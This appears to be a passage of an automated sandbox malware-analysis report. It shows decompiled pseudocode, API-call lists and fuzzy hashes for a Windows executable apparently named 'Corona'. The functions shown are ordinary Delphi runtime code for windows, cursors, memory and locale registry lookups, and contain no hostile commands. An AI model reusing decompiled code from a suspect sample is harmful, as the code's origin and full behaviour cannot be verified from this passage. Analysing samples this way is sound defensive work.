                                  							__eflags =  *_t79;
                                  							goto L16;
                                  						}
                                  						_t68 = _t67 - 3;
                                  						__eflags = _t68;
                                  						if(_t68 == 0) {
                                  							goto L15;
                                  						}
                                  						__eflags = _t68 != 3;
                                  						if(_t68 != 3) {
                                  							goto L16;
                                  						}
                                  						goto L15;
                                  					}
                                  					_v24 = E00444FDC(_t96);
                                  					if(_v24 == 0) {
                                  						goto L32;
                                  					}
                                  					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                                  					if(_t73 == 0) {
                                  						goto L32;
                                  					}
                                  				} else {
                                  					_v24 = E00444FDC(__eax);
                                  					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                                  						if(_t73 == 0) {
                                  							goto L4;
                                  						}
                                  					}
                                  				}
                                  				return _t73;
                                  			}

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0042FB8D
                                  • KiUserCallbackDispatcher.NTDLL ref: 0042FBE0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CallbackDispatcherKeyboardStateUser
                                  • String ID:
                                  • API String ID: 4281813569-0
                                  • Opcode ID: c397eee2e54774f553fe80ba5e0f14c2f0c986b241041ab36c5d9285bcd6eac7
                                  • Instruction ID: 00b2bcc830db05189438873d62b20479d6555502c69b5680d4ee4e2ac5f0d7c1
                                  • Opcode Fuzzy Hash: c397eee2e54774f553fe80ba5e0f14c2f0c986b241041ab36c5d9285bcd6eac7
                                  • Instruction Fuzzy Hash: 8F4191307002258BDB20CF68E5986AABBB4AB45304FD441B7E405DB396D77CFD4ACB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004019FC: RtlInitializeCriticalSection.KERNEL32(004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                    • Part of subcall function 004019FC: RtlEnterCriticalSection.KERNEL32(004525C8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                    • Part of subcall function 004019FC: LocalAlloc.KERNEL32(00000000,00000FF8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                    • Part of subcall function 004019FC: RtlLeaveCriticalSection.KERNEL32(004525C8,00401AB9,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  • RtlEnterCriticalSection.KERNEL32(004525C8,00000000,00402264), ref: 00402133
                                  • RtlLeaveCriticalSection.KERNEL32(004525C8,0040226B), ref: 0040225E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: 516a3cd2ebdca4a963e3ab3a65ad23722ef784fb924c829345a2c0903020c877
                                  • Instruction ID: 2a17153c8fad00030586e2ea1ef5383a8770bf21e291bdf0f7973367168ab37b
                                  • Opcode Fuzzy Hash: 516a3cd2ebdca4a963e3ab3a65ad23722ef784fb924c829345a2c0903020c877
                                  • Instruction Fuzzy Hash: 364103B2A047049FE715CF69DE9922977A0FB46319B2541BFD401F73E2E2B8A901CB4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044B980(void* __eax) {
                                  				struct HICON__* _t5;
                                  				void* _t7;
                                  				void* _t8;
                                  				struct HINSTANCE__* _t11;
                                  				CHAR** _t12;
                                  				void* _t13;
                                  
                                  				_t13 = __eax;
                                  				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                  				_t8 = 0xffffffea;
                                  				_t12 = 0x450cb0;
                                  				do {
                                  					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                  						if(_t8 != 0xffffffeb) {
                                  							_t11 = 0;
                                  						} else {
                                  							goto L4;
                                  						}
                                  					} else {
                                  						L4:
                                  						_t11 =  *0x452664; // 0x400000
                                  					}
                                  					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                  					_t7 = E0044BA38(_t13, _t5, _t8);
                                  					_t8 = _t8 + 1;
                                  					_t12 =  &(_t12[1]);
                                  				} while (_t8 != 0xffffffff);
                                  				return _t7;
                                  			}










                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CursorLoad
                                  • String ID:
                                  • API String ID: 3238433803-0
                                  • Opcode ID: 44e8e0c868297989131988027fa6405fef302279d83b1ee55fa26e3801488370
                                  • Instruction ID: 1ea9eced8182a7bb80591af10c9a6fca55f1b020b1f35a3f327f2a7d6308c993
                                  • Opcode Fuzzy Hash: 44e8e0c868297989131988027fa6405fef302279d83b1ee55fa26e3801488370
                                  • Instruction Fuzzy Hash: 6FF08262A0435417AA20563E5CC1A2A7284DB96735F71033BFA2AD63D1CB39EC028699
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406714(int __eax, long __edx) {
                                  				void* _t2;
                                  
                                  				_t2 = GlobalAlloc(__eax, __edx); // executed
                                  				GlobalFix(_t2);
                                  				return _t2;
                                  			}





                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Global$Alloc
                                  • String ID:
                                  • API String ID: 2558781224-0
                                  • Opcode ID: a91d873cc96961059f0ff57fc0c7ac3617c9ee3aa2e20b9fa74691af3b7816ce
                                  • Instruction ID: 871b2fc79884c773065efd50e950bf119b60d0cd6bc374945b811ddc14d11b55
                                  • Opcode Fuzzy Hash: a91d873cc96961059f0ff57fc0c7ac3617c9ee3aa2e20b9fa74691af3b7816ce
                                  • Instruction Fuzzy Hash: F29002C4864A4224ED0072B20C0AD3F041CDCD07083C0486F3004B20878A3C8C00083D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401514(void* __eax, void** __edx) {
                                  				void* _t3;
                                  				void** _t8;
                                  				void* _t11;
                                  				long _t14;
                                  
                                  				_t8 = __edx;
                                  				if(__eax >= 0x100000) {
                                  					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                  				} else {
                                  					_t14 = 0x100000;
                                  				}
                                  				_t8[1] = _t14;
                                  				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                  				_t11 = _t3;
                                  				 *_t8 = _t11;
                                  				if(_t11 != 0) {
                                  					_t3 = E004013C8(0x4525e8, _t8);
                                  					if(_t3 == 0) {
                                  						VirtualFree( *_t8, 0, 0x8000);
                                  						 *_t8 = 0;
                                  						return 0;
                                  					}
                                  				}
                                  				return _t3;
                                  			}








                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040181D), ref: 00401543
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040181D), ref: 0040156A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: a607c74df08413ae2df3ce57e4748049c4e7691b590c2dee72c4e2ec912d6aee
                                  • Instruction ID: 929b3d79ffeb89c3cac09a9880bac3458cfdc7d31ab478386ca27a7044c283c0
                                  • Opcode Fuzzy Hash: a607c74df08413ae2df3ce57e4748049c4e7691b590c2dee72c4e2ec912d6aee
                                  • Instruction Fuzzy Hash: 4DF08272F0062027EB605AAA5C85B535A849B857A0F1540B7FE09FF3E9D6B58C0142AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044E66C(intOrPtr __eax) {
                                  				intOrPtr _v8;
                                  				intOrPtr _t8;
                                  				intOrPtr _t9;
                                  				intOrPtr _t13;
                                  				void* _t16;
                                  				void* _t23;
                                  				void* _t27;
                                  				void* _t29;
                                  				void* _t30;
                                  				intOrPtr _t31;
                                  
                                  				_v8 = __eax;
                                  				_t8 = _v8;
                                  				if( *((intOrPtr*)(_t8 + 0x30)) != 0) {
                                  					_t9 =  *0x452bb4; // 0x2131320
                                  					_t29 = E0044B870(_t9) - 1;
                                  					if(_t29 < 0) {
                                  						L9:
                                  						return E0044E610(0, _t31);
                                  					}
                                  					_t30 = _t29 + 1;
                                  					_t27 = 0;
                                  					while(1) {
                                  						_t13 =  *0x452bb4; // 0x2131320
                                  						_t23 = E0044B85C(_t13, _t27);
                                  						if( *((char*)(_t23 + 0x57)) != 0 && ( *(_t23 + 0x190) == 0 || E00435154(_t23) != 0 || IsChild(E00434EF4(_t23),  *(_t23 + 0x190)) == 0)) {
                                  							break;
                                  						}
                                  						_t27 = _t27 + 1;
                                  						_t30 = _t30 - 1;
                                  						if(_t30 != 0) {
                                  							continue;
                                  						}
                                  						goto L9;
                                  					}
                                  					_t16 = E0044E610(1, _t31); // executed
                                  					return _t16;
                                  				}
                                  				return _t8;
                                  			}














                                  APIs
                                  • IsChild.USER32(00000000,00000000), ref: 0044E6CA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Child
                                  • String ID:
                                  • API String ID: 3815930669-0
                                  • Opcode ID: cad04f721ded33b40a2f7cf7e7344c33a0d4cc7366892991884cb40792fb2e97
                                  • Instruction ID: 2553d2f463d1a2d35830ae31264210490092e659a8a63558b15f5b2f19cfb3f2
                                  • Opcode Fuzzy Hash: cad04f721ded33b40a2f7cf7e7344c33a0d4cc7366892991884cb40792fb2e97
                                  • Instruction Fuzzy Hash: 5001B531A042145BFB11AA6F9D45B9B739CBB20358F92147BF804CB252DA7CDC0086AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 41%
                                  			E004132A8(void* __eax, struct HINSTANCE__* __edx) {
                                  				intOrPtr _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t10;
                                  				intOrPtr _t15;
                                  				struct HINSTANCE__* _t20;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t30;
                                  				void* _t32;
                                  				intOrPtr* _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t40;
                                  
                                  				_t38 = _t40;
                                  				_push(_t22);
                                  				_t35 = _t22;
                                  				_t20 = __edx;
                                  				_t32 = __eax;
                                  				if(__edx == 0) {
                                  					_t20 =  *0x452664; // 0x400000
                                  				}
                                  				_t10 = FindResourceA(_t20, E0040430C(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
                                  				_t43 = _t10;
                                  				if(_t10 == 0) {
                                  					return _t10;
                                  				} else {
                                  					_push(_t32);
                                  					_push(0xa);
                                  					_v8 = E00415BC8(_t20, 1);
                                  					_push(_t38);
                                  					_push(0x41331c);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t40;
                                  					_t15 = E004156C8(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
                                  					 *_t35 = _t15;
                                  					_pop(_t30);
                                  					 *[fs:eax] = _t30;
                                  					_push(E00413323);
                                  					return E004030FC(_v8);
                                  				}
                                  			}



















                                  APIs
                                  • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 004132CA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FindResource
                                  • String ID:
                                  • API String ID: 1635176832-0
                                  • Opcode ID: e8a400e94294f39d569de3495f7840357d58904100a51dfcf8cbf1242b1d1131
                                  • Instruction ID: 1c110013ace38ab411131a24d31fa12a1cd2c8f4e4a854ede420c50bd2529dd0
                                  • Opcode Fuzzy Hash: e8a400e94294f39d569de3495f7840357d58904100a51dfcf8cbf1242b1d1131
                                  • Instruction Fuzzy Hash: 5B014731304304AFE310EF56EC42DAAB7ADDB89324751407AF90093391DA79AD008658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E0040679A(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                  				CHAR* _v8;
                                  				void* _t13;
                                  				struct HWND__* _t24;
                                  				CHAR* _t31;
                                  				long _t38;
                                  
                                  				_push(_t31);
                                  				_v8 = _t31;
                                  				_t38 = __eax;
                                  				_t13 = E00402908();
                                  				_t24 = CreateWindowExA(_t38, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E004028F8(_t13);
                                  				return _t24;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 0f791f5ec92d7411cc98720ed8fc28380d029dde8c53ca6ab55f4098cc804929
                                  • Instruction ID: 41f77127b050866993e62dbd8b4b8cdc0627ff4e7fbb11427cfc4cb163cae08b
                                  • Opcode Fuzzy Hash: 0f791f5ec92d7411cc98720ed8fc28380d029dde8c53ca6ab55f4098cc804929
                                  • Instruction Fuzzy Hash: 2CF0CFB2700108BF8B80DE9DDC85E9B77ECEB4D2A4B01412AFA08E3200D234ED108BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040679C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                  				CHAR* _v8;
                                  				void* _t13;
                                  				struct HWND__* _t24;
                                  				CHAR* _t29;
                                  				long _t32;
                                  
                                  				_v8 = _t29;
                                  				_t32 = __eax;
                                  				_t13 = E00402908();
                                  				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E004028F8(_t13);
                                  				return _t24;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 85e4eb90c000c236c85eadefe313f4ffd22fa3105f9eac2d859ba02dd15c19cb
                                  • Instruction ID: de0e102495ea7130531c77c1ef8f652a4e44ef770002770581a3c477095a4666
                                  • Opcode Fuzzy Hash: 85e4eb90c000c236c85eadefe313f4ffd22fa3105f9eac2d859ba02dd15c19cb
                                  • Instruction Fuzzy Hash: 9DF07FB6700118AF8B80DE9DDD85E9B77ECEB4D2A4B05412AFA18E3241D674ED118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004067F4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                  				long _v8;
                                  				void* _t12;
                                  				struct HWND__* _t22;
                                  				long _t27;
                                  				CHAR* _t30;
                                  
                                  				_v8 = _t27;
                                  				_t30 = __eax;
                                  				_t12 = E00402908();
                                  				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                  				E004028F8(_t12);
                                  				return _t22;
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: d0f946a022014cc29194e441e8b5c77c45096e0facff00cf9c5014c6900ae325
                                  • Instruction ID: fcd10d3d88eaa5ad34109d01075fa5bcd444e4693c61fb235d97a77239da6274
                                  • Opcode Fuzzy Hash: d0f946a022014cc29194e441e8b5c77c45096e0facff00cf9c5014c6900ae325
                                  • Instruction Fuzzy Hash: E3F0E2B2700208BFCB80DE9EDC85E9B77ECEB4D2A4B00412ABA0CE3241D174EC1087B0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00439D64(void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _t6;
                                  				intOrPtr _t8;
                                  				intOrPtr _t10;
                                  				intOrPtr _t12;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				void* _t17;
                                  				intOrPtr _t20;
                                  				intOrPtr _t21;
                                  				intOrPtr _t22;
                                  				intOrPtr _t23;
                                  				intOrPtr _t28;
                                  
                                  				_t25 = __esi;
                                  				_t17 = __ecx;
                                  				_push(_t28);
                                  				_push(0x439dea);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t28;
                                  				 *0x452b18 =  *0x452b18 - 1;
                                  				if( *0x452b18 < 0) {
                                  					 *0x452b14 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                  					_t31 =  *0x452b14;
                                  					E00439B30(_t16, __edi,  *0x452b14);
                                  					_t6 =  *0x42a6a0; // 0x42a6ec
                                  					E00412F34(_t6, _t16, _t17,  *0x452b14);
                                  					_t8 =  *0x42a6a0; // 0x42a6ec
                                  					E00412FD4(_t8, _t16, _t17, _t31);
                                  					_t21 =  *0x42a6a0; // 0x42a6ec
                                  					_t10 =  *0x43b104; // 0x43b150
                                  					E00412F80(_t10, _t16, _t21, __esi, _t31);
                                  					_t22 =  *0x42a6a0; // 0x42a6ec
                                  					_t12 =  *0x439df4; // 0x439e40
                                  					E00412F80(_t12, _t16, _t22, __esi, _t31);
                                  					_t23 =  *0x42a6a0; // 0x42a6ec
                                  					_t14 =  *0x439f18; // 0x439f64
                                  					E00412F80(_t14, _t16, _t23, _t25, _t31);
                                  				}
                                  				_pop(_t20);
                                  				 *[fs:eax] = _t20;
                                  				_push(0x439df1);
                                  				return 0;
                                  			}
















                                  APIs
                                  • GetVersion.KERNEL32(00000000,00439DEA), ref: 00439D7E
                                    • Part of subcall function 00439B30: GetCurrentProcessId.KERNEL32(?,00000000,00439CA8), ref: 00439B51
                                    • Part of subcall function 00439B30: GlobalAddAtomA.KERNEL32 ref: 00439B84
                                    • Part of subcall function 00439B30: GetCurrentThreadId.KERNEL32 ref: 00439B9F
                                    • Part of subcall function 00439B30: GlobalAddAtomA.KERNEL32 ref: 00439BD5
                                    • Part of subcall function 00439B30: RegisterClipboardFormatA.USER32 ref: 00439BEB
                                    • Part of subcall function 00439B30: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 00439C6F
                                    • Part of subcall function 00439B30: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00439C80
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                  • String ID:
                                  • API String ID: 3775504709-0
                                  • Opcode ID: 94ac02c2c14a6a5a9030652c52386c41390c28d5d1cbe5cc04f3b75338800a9b
                                  • Instruction ID: a99d796cf09870756797ea3243eeb7a2ebe9b797756b885923b7976b6a35b7b9
                                  • Opcode Fuzzy Hash: 94ac02c2c14a6a5a9030652c52386c41390c28d5d1cbe5cc04f3b75338800a9b
                                  • Instruction Fuzzy Hash: AAF037343142418FD614EF26EE9395673A4FB49304BDA103AF84082666C7A8AC63DA8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404EA0(void* __eax) {
                                  				char _v272;
                                  				intOrPtr _t14;
                                  				void* _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t19;
                                  
                                  				_t16 = __eax;
                                  				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                  					_t3 = _t16 + 4; // 0x400000
                                  					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                  					_t14 = E004050DC(_t19); // executed
                                  					_t18 = _t14;
                                  					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                  					if(_t18 == 0) {
                                  						_t5 = _t16 + 4; // 0x400000
                                  						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                  					}
                                  				}
                                  				_t7 = _t16 + 0x10; // 0x400000
                                  				return  *_t7;
                                  			}









                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,00410414,00404F08,004059AC,0000FF9D,?,00000400,?,00410414,004136A7,00000000,004136CC), ref: 00404EBE
                                    • Part of subcall function 004050DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001,00410414,00404F08,004059AC,0000FF9D,?), ref: 004050F8
                                    • Part of subcall function 004050DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001), ref: 00405116
                                    • Part of subcall function 004050DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4), ref: 00405134
                                    • Part of subcall function 004050DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405152
                                    • Part of subcall function 004050DC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040519B
                                    • Part of subcall function 004050DC: RegQueryValueExA.ADVAPI32(?,00405348,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001), ref: 004051B9
                                    • Part of subcall function 004050DC: RegCloseKey.ADVAPI32(?,004051E8,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004051DB
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Open$FileModuleNameQueryValue$Close
                                  • String ID:
                                  • API String ID: 2796650324-0
                                  • Opcode ID: 0ef6dd6ea0a7583c5597149073394501fd938edc92eb879c0ef5ecac17f741e7
                                  • Instruction ID: 8b1c8c533dd4c884e6db8f6835b50d8e4bb5f8094e49f176a92dc794993722f9
